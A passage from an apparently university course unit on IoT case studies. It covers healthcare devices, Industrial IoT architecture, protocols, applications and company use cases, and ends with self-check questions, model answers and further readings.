monitoring the frequency of attacks, as well as collecting data from the
environment to help healthcare providers understand what triggered an attack.

In addition, connected inhalers can alert patients when they leave inhalers at
home, placing them at risk of suffering an attack without their inhaler present,
or when they use the inhaler improperly.

12.8.8.2 Ingestible Sensors

Collecting data from inside the human body is typically a messy and highly
disruptive affair. With ingestible sensors, it’s possible to collect information
from digestive and other systems in a much less invasive way. They provide
insights into stomach PH- levels, for instance, or help pinpoint the source of
internal bleeding.

These devices must be small enough to be swallowed easily. They must also be
able to dissolve or pass through the human body cleanly on their own. Several
companies are hard at work on ingestible sensors that meet these criteria.

12.8.8.3 Connected Contact Lens

Smart contact lenses provide another opportunity for collecting healthcare data
in a passive, non-intrusive way. They could also, incidentally, include
microcameras that allow wearers effectively to take pictures with their eyes,

26
IoT Case Studies
which is probably why companies like Google have patented connected
contact lenses.

Whether they’re used to improve health outcomes or for other purposes, smart
lenses promise to turn human eyes into a powerful tool for digital interactions.

12.8.8.4 Robotic Surgery

By deploying small Internet-connected robots inside the human body, surgeons


can perform complex procedures that would be difficult to manage using
human hands. At the same time, robotic surgeries performed by small IoT
devices can reduce the size of incisions required to perform surgery, leading to
a less invasive process, and faster healing for patients.

These devices must be small enough and reliable enough to perform surgeries
with minimal disruption. They must also be able to interpret complex
conditions inside bodies in order to make the right decisions about how to
proceed during a surgery. But IoT robots are already being used for
surgery, showing that these challenges can be adequately addressed.

Healthcare IoT is not without challenges. IoT-enabled connected devices


capture huge amounts of data, including sensitive information, giving rise to
concerns about data security. Implementing apt security measures is crucial.
IoT explores new dimensions of patient care through real-time health
monitoring and access to patients’ health data. This data is a goldmine for
healthcare stakeholders to improve patient’s health and experiences while
making revenue opportunities and improving healthcare operations. Being
prepared to harness this digital power would prove to be the differentiator in
the increasingly connected world.

In the next section, we will study an important concept namely Industrial


Internet of Things(IIoT) and its applications.

12.9 INDUSTRIAL IoT (IIoT)

Industrial IoT is defined as a network of devices, machinery and sensors


connected to each other and to the Internet, with the purpose of collecting data
and analyze it to apply this information in continuous process improvement.
There are many Industrial IOT applications out there, and they have driven an
increasing number of companies to engage in this new paradigm to improve
their productivity and optimize their expenses and profits.

12.9.1 Industry 4.0 and IIoT

Industry 4.0 is the outcome of the fourth industrial revolution. The fourth
industrial revolution is defined by the integration of conventional, automated

27
Application
Development, manufacturing with industrial processes powered by intelligent technologies
Fog Computing and
Case Studies
and autonomously communicating devices.

The term Industry 4.0 or I4.0 or simply I4, emerged in 2011 from an initiative
of the German government that, over the last two decades, advocated the
digitization of industrial processes significantly.

As stated by the Boston Consulting Group, IIoT is a major pillar of Industry


4.0, along with additive manufacturing or 3D printing, augmented reality (AR),
autonomous robots, big data analytics, cloud computing, cyber security,
horizontal and vertical system integration, and simulations. This is because
autonomous communication among machines and a dispersed digital
environment enables the automated resolution of problems that previously
required human intervention.

Industry 4.0 covers IIoT, digitalization, and corporate sustainability in its


broader scope. IIoT is the driving force behind industry 4.0, which would not
exist without it. In other words, IIoT is restricted to data detection, data
transfer, data computing, data processing, and domain-specific intelligent
applications.

12.9.2 IIoT Architecture

A typical industrial IoT architecture or IIoT architecture describes the


arrangement of digital systems so that they together provide network and data
connectivity between sensors, IoT devices, data storage, and other layers.
Therefore, IIoT architecture have the following components:

12.9.2.1 IoT-Enabled Devices (At the Edge of the Network)

These are the groupings of networked objects located at the edge of an IoT
ecosystem. These are situated as near as feasible to the data source. These are
often wireless actuators and sensors in an industrial environment. A processing
unit or small computing device and a collection of observing endpoints are
present. Edge IoT devices may range from legacy equipment in a brownfield
environment to cameras, microphones, sensors, and other meters and monitors.

What occurs at the network’s most remote edge? Sensors acquire data from
both the surrounding environment and the items they monitor. Then, they
transform the information into metrics and numbers that an IoT platform can
analyze and transform into actionable insights. Actuators control the processes
occurring in the observed environment. They modify the physical
circumstances in which data is produced.

12.9.2.2 Edge Data Management

Without high-quality, high-volume data, sophisticated analytics and artificial


intelligence cannot be used to their full potential. Even on the sensor level, data
processing is possible, which is necessary if you need information
immediately.

28
IoT Case Studies
In this aspect, edge computing provides the quickest answers since data is
preprocessed at the network’s edge, at the sensors themselves. Here, you can
conduct analyses on your digital and aggregated data. Once the relevant
insights have been gathered, one can move forward to the next stage instead of
sending all the collected information. This additional processing decreases data
volume sent to data centers or the cloud.

12.9.2.3 Use of Cloud for Advanced Processing

Edge devices are restricted in their capacity for preprocessing. While you
should strive to reach as near to the edge as is realistically possible to limit the
consumption of native computational power, users will need to utilize the
cloud for processing that is more in-depth and thorough.

At this point, you must choose whether to prioritize the agility and immediacy
of edge devices or the advanced insights of cloud computing. Cloud-based
solutions can perform extensive processing. Here, it is possible to aggregate
data from different sources and provide insights that are unavailable at the
edge.

In the context of IIoT architecture, the cloud will have:

 A Hub: It offers a secure link to the on-site system in addition to


telemetry and device control. The hub provides remote connectivity to
and from on-premises systems, if required, across several locations. It
maintains all elements of communication, such as connection
management, the secure communication channel, and device
verification and authorization.
 Storage: It is useful for storing information before and after it is
processed.
 Analytics: It aids in data processing and analysis.
 An User Interface: It provides visualization for conveying the analysis
findings to the end user, often via a web browser interface and also
through alerts via email, text message, and/or phone call.

12.9.2.4 Internet Gateways

The sensor data is gathered and turned into digital channels for further
processing at the Internet gateway. After obtaining the aggregated and
digitized data, the gateway transmits it over the internet so that it may be
further processed before being uploaded to the cloud. Gateways continue to be
part of the edge’s data-collecting systems. They remain adjacent to the
actuators and sensors and perform preliminary data processing at the edge.

Gateways may be deployed as hardware or software:

 Hardware: Hardware gateways are autonomous devices. Wire-based


(analog and digital) and wireless interfaces are provided for the
downstream sensor connection. They also provide Internet
connectivity, either natively or via a standard link to a router.
 Software: On PCs, software gateways may be installed instead of
connecting hardware gateways. The software operates either in the
29
Application
Development, background or foreground and offers upstream and downstream
Fog Computing and
Case Studies
communications links as the hardware entry point, with the PC
supplying the physical interfaces. Software-based gateways may enable
access to visual sensor settings and sensor data presentation via user
interfaces.

12.9.2.5 Connectivity Protocols

Protocols are required for the transfer of data across the IIoT system. These
protocols should preferably be industry-standard, well-defined, and secure.
Protocol specifications may contain physical properties of connections and
cabling, the procedure for establishing a communication channel, and the
format of the data sent over that channel. Some of the common protocols used
in IIoT architecture include:

 Advanced Message Queueing Protocol (AMQP): It is a connection-


led, bidirectional, multiplexing, compact data-encoding message
transport protocol. AMQP, unlike HTTP, was built for IIoT-oriented
cloud connectivity.
 MQ Telemetry Transport (MQTT): This is a compact client-server
message transport protocol. MQTT benefits IIoT devices because of its
short message frame sizes and minimal code space.
 Constrained Application Protocol (CoAP): This is a datagram-led
protocol that may be deployed via a transport layer, including user
datagram protocol (UDP). CoAP is a condensed version of HTTP
developed for IIoT requirements.

12.9.2.6 IIoT platforms

IIoT systems are now capable of orchestrating, monitoring, and controlling


operations throughout the whole value chain. The platforms control the device
data and manage the analytics, data visualization, and artificial intelligence
(AI) duties from the edge devices and, in certain cases, the sensors right
through to the cloud and back.

To have access to this competitive advantage, one would be wise to know the
main IIoT applications and how to implement the system.

12.9.3 Applications of IIoT

Following are some of the applications of IIoT:

12.9.3.1 Automated and remote equipment management and


monitoring

One of the main IIoT applications is related to the automated management of


equipment, allowing a centralized system to control and monitor all company
processes.

This ability to remotely control equipment via digital machines and software
also implies that it is possible to control several plants located at different
geographic locations.
30
IoT Case Studies
This gives companies an unprecedented ability to oversee advances in their
production in real time, while also being able to analyze historical data that
they obtain in relation to their processes. The objective of collecting and using
that data is to support the improvement of processes and generating an
environment where information-based decisions are a priority.

12.9.3.2 Predictive Maintenance

Predictive maintenance consists of detecting the need for a machine to


be maintained before a crisis takes place and production needs to be stopped
urgently. It is therefore among the reasons to implement a data acquisition,
analysis and management system.

This system is one of the most effective Industrial IOT applications and works
via sensors that, once installed on the machines and operating platforms,
can send alerts when certain risk factors emerge. For example, the sensors that
monitor robots or machines submit data to the platforms, which analyze the
data received in real time and apply advanced algorithms that can issue
warnings regarding high temperatures or vibrations that exceed normal
parameters.

12.9.3.3 Faster Implementation of Improvements

IIoT generates valuable information so that those in charge of improving


processes in an industrial business model (process, quality or manufacturing
engineers) can access data and analyze it faster and automatically, and
remotely perform the necessary processes adjustments. This also increases the
speed in which changes and improvements are applied in Operational
Intelligence and Business Intelligence – changes that are already offering
competitive advantages to a myriad of industrial businesses.

12.9.3.4 Pinpoint Inventories

The use of Industrial IoT systems allows for the automated monitoring of
inventory, certifying whether plans are followed and issuing an alert in case of
deviations. It is yet another essential Industrial IOT application to maintain
a constant and efficient workflow.

12.9.3.5 Quality Control

Another entry among the most important IIoT applications is the ability to
monitor the quality of manufactured products at any stage: from the raw
materials that are used in the process, to the way in which they are transported
(via smart tracking applications), to the reactions of the end customer once the
product is received.

This information is vital when studying the efficiency of the company and
applying the necessary changes in case failures are detected, with the purpose
of optimizing the processes and promptly detect issues in the production chain.
It has also been proven that it is essential to prevent risks in more delicate
industries, such as pharmaceutics or food.

31
Application
Development, 12.9.3.6 Supply Chain Optimization
Fog Computing and
Case Studies
Among the Industrial IoT applications aimed at achieving a higher efficiency,
we can find the ability to have real time in-transit information regarding the
status of a company’s supply chain.

This allows for the detection of various hidden opportunities for


improvement or pinpointing the issues that are hindering processes, making
them inefficient or unprofitable.

12.9.3.7 Plant Safety Improvement

Machines that are part of IIoT can generate real-time data regarding the
situation on the plant. Through the monitoring of equipment damages, plant air
quality and the frequency of illnesses in a company, among other indicators, it
is possible to avoid hazardous scenarios that imply a threat to the workers.

This not only boosts safety in the facility, but also productivity and employee
motivation. In addition, economic and reputation costs that result from poor
management of company safety are minimized.

12.9.4 IIoT Use Cases

Most notable industries and companies, from retail to manufacturing, use IIoT
in some way. Here are some notable IIoT examples that have resulted in
positive business outcomes:

12.9.4.1 IIoT for Asset Tracking

Embedded IIoT components in shipping, fleets, and packaging may aid in


tracking inventories from start to end. It should also maintain equilibrium
between supply and demand by tracking inventory levels. PepsiCo is an
example of an organization that utilizes this industrial IoT use case. It employs
a vast array of technologies to adapt to market demands, manage inventory
system visibility, and automatically adjust replenishment rules.

12.9.4.2 IIoT to Create Digital Twins

Digital twins are an industrial IoT application in which a sophisticated


collection of sensors are utilized to construct an accurate simulation of a
product or production environment, down to the last detail and physical
characteristics. BMW company employs IIoT, artificial intelligence (AI), and
immersive technologies to construct a digital duplicate of a factory’s entire
production process. This enables the organization to develop, evaluate, and
optimize goods in a realistic setting without incurring related expenses or risks.

12.9.4.3 IIoT for Remote Monitoring and Cost Savings

32
IoT Case Studies
The energy and utilities sector utilizes large operational infrastructure,
sometimes in hazardous conditions where human operators are unsuitable. In
these instances, IIoT devices may gather and transmit crucial operational data
without the presence of a human operator. For example, Larsen & Toubro
(L&T) is deploying a remotely monitored Green Hydrogen Station in Gujarat,
India. Using IIoT, L&T may reduce operational and energy expenses and gain
relevant insights into the functioning of the energy plant.

12.9.4.4 IIoT for Environmental Monitoring

The food and beverage sector relies heavily on the capacity to manufacture and
store products under ideal environmental conditions. IIoT systems may
monitor environmental changes to warn floor managers before product
degradation occurs.

The distilleries producing alcoholic beverages are an ideal example of IIoT


since they operate under delicate environmental conditions. Frilli, a supplier of
distillation plants, has recently deployed IIoT technologies for an Irish
beverage brand to provide automation, efficiency, and uniform process flows.

12.9.4.5 IIoT Platform to Build a Smart Factory

Airbus seeks to eliminate faults by integrating industrial IoT sensors into


machines and equipment on the manufacturing floor and providing employees
with wearables (such as industrial smart glasses). A single error in the process
might cost the organization millions of dollars to rectify. After launching its
“Factory of the Future” in collaboration with Bosch, Airbus is using digital
intelligence to optimize operations and increase productivity.

 Check Your Progress 1

1) What is the importance of IoT?

…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
2) Where is IoT mainly used?

…………………………………………………………………………………
…………………………………………………………………………………
3) What are the major features of IoT?
…………………………………………………………………………………
…………………………………………………………………………………
4) Explore and discuss additional applications of IoT which are not presented
in this Unit.
…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
33
Application
Development,
Fog Computing and
Case Studies
12.10 SUMMARY

In this unit we had focused on various applications of IoT in Smart Cities,


Smart Homes, Smart Transportation, Smart Grids, Smart Healthcare,
Connected Vehicles and Industrial IoT. As this is an emerging area, explore
more applications and also try to develop some applications as the part of your
major Project. Also, you can think of Start-up’s in this area.

12.11 SOLUTIONS / ANSWERS

Check Your Progress 1

1. The Internet of Things, or IoT, is a rapidly evolving technological


field that transforms any electronic device into a smarter one. Many
industries are beginning to incorporate this technology into their
operations in order to increase productivity and efficiency.

IoT applications aid in decision making, tracking and monitoring


systems in real-time, and automating daily tasks for convenience.

This cutting-edge technology offers the user several features, including


cloud data storage, a platform for analyzing the collected data, real-
time analytics, etc., in addition to connecting the device to the internet.
This technology can be integrated into almost any industry due to its
broad range of applications.

2. IoT applications are primarily used to build smart homes and smart
cities etc... IoT solutions are already in use in the following industries:

Building and Home Automation


IoT can automate lighting, cooling, security systems, and other building
functions.

Automation and Optimization of Industrial Production


IoT systems reduce the need for manual labor while increasing the
efficiency of industrial production processes.

Public Utilities Administration


IoT systems can connect entire cities to reduce waste and improve
access to public utilities.

Information Technology
With network data collected by embedded IoT devices, digital
communication hardware and software can be managed and optimized.
Transportation and traffic management

34
IoT Case Studies

3. The following are major IoT features:

 Connectivity: Establishing a proper connection between all IoT


devices and the IoT platform, this could be a server or the cloud.

 Analyzing: After connecting all of the relevant things, it is time to


analyze the data collected in real-time and use it to build effective
business intelligence.

 Integrating: IoT integrates various models to improve user experience.

 Artificial Intelligence: IoT makes things smart and improves people’s


lives by utilizing data.

 Sensing in IoT: In IoT technologies, sensor devices detect and measure


environmental changes and report their status.

 Active Engagement: IoT allows connected technology, products, or


services to engage in active engagement with one another.

 Endpoint Management: Endpoint management is critical for all IoT


systems; otherwise, the system will fail completely.

4. Some of the application of IoT are as follows:

IoT Applications in Manufacturing

The world of manufacturing and industrial automation is another big


winner in the IoT sweepstakes. RFID and GPS technology can help a
manufacturer track a product from its start on the factory floor to its
placement in the destination store, the whole supply chain from start to
finish. These sensors can gather information on travel time, product
condition, and environmental conditions that the product was subjected
to.

Sensors attached to factory equipment can help identify bottlenecks in


the production line, thereby reducing lost time and waste. Other sensors
mounted on those same machines can also track the performance of the
machine, predicting when the unit will require maintenance, thereby
preventing costly breakdowns.

IoT Applications in Retail

IoT technology has a lot to offer the world of retail. Online and in-store
shopping sales figures can control warehouse automation and robotics,
information gleaned from IoT sensors. Much of this relies on RFIDs,
which are already in heavy use worldwide.

Mall locations are iffy things; business tends to fluctuate, and the
advent of online shopping has driven down the demand for brick and
35
Application
Development, mortar establishments. However, IoT can help analyze mall traffic so
Fog Computing and
Case Studies that stores located in malls can make the necessary adjustments that
enhance the customer’s shopping experience while reducing overhead.

Speaking of customer engagement, IoT helps retailers target customers


based on past purchases. Equipped with the information provided
through IoT, a retailer could craft a personalized promotion for their
loyal customers, thereby eliminating the need for costly mass-
marketing promotions that don’t stand as much of a chance of success.
Much of these promotions can be conducted through the customers’
smartphones, especially if they have an app for the appropriate store.

IoT Applications in Wearables

From medical to fitness to GPS tracking, wearables serve a wide range


of purposes. These IoT have more than doubled in the last three years.

The fitness bands monitor calorie expenditure, meters of distance


covered, heartbeats per minute, blood oxygen level, and more. These
IoT mostly come in the form of wristbands/watches. However, they can
also appear as earbuds, clip-on devices, or smart fabric.

Other wearables include virtual glasses and GPS tracking belts. These
small and energy-efficient devices equipped with sensors and software
collect and organize data about users. Top companies like Apple,
Google, Fitbit, and Samsung, are behind the introduction of the Internet
of Things.

IoT Applications in Fleet Management

The installation of IoT sensors in fleet vehicles has been a boon for
geo-location, performance analysis, fuel savings, telemetry control,
pollution reduction, and information to improve the driving of
vehicles.

They help establish effective interconnectivity between the vehicles,


managers, and drivers. They assure that both drivers and owners know
all details about vehicle status, operation, and requirements. The
introduction of maintenance alarms in real-time help skip the
dependence on the drivers for their detection.

IoT Applications in Hospitality

Interesting improvements to the service quality have found their way


with the application of the IoT to the hotel industry. The hassle-free
automation of various interactions, such as electronic keys sent directly
to each guest's mobile devices, has brought about a transformation. It
provides easy check-out processes, immediate information on the

36
IoT Case Studies
availability of rooms, and quicker assignment of housekeeping tasks
while disabling the operation of doors.

The guest’s location, sending offers on activities of interest, the


realization of orders to the room, the automatic charge of accounts to
the room, and more can easily be handled via integrated applications
using IoT technology.

IoT Applications in Maintenance Management

Maintenance management is one of those areas where the application


of IoT technology is most extensive. Sensors and software specialized
in EAM/CMMS maintenance management provide a multifunctional
tool applicable to many disciplines. It helps extend the functional life of
physical assets, guaranteeing availability and reliability.

Real-time monitoring of physical assets enables the determination of


instances when a measurement gets out of range and demands
condition-based maintenance (CBM) or AI application to predict a
failure.

12.12 FURTHER READINGS

1. Internet of Things, Jeeva Jose, Khanna Publishing, 2018.


2. Internet of Things - A Hands-on Approach, Arshdeep Bahga and Vijay
Madisetti, Universities Press, 2015.
3. IoT Fundamentals: Networking Technologies, Protocols and Use Cases
for the Internet of Things, Hanes David, Salgueiro Gonzalo, Grossetete
Patrick, Barton Rob, Henry Jerome, Pearson, 2017.
4. Designing the Internet of Things, Adrian Mcwen, Hakin Cassimally,
Wiley, 2015.

37

You might also like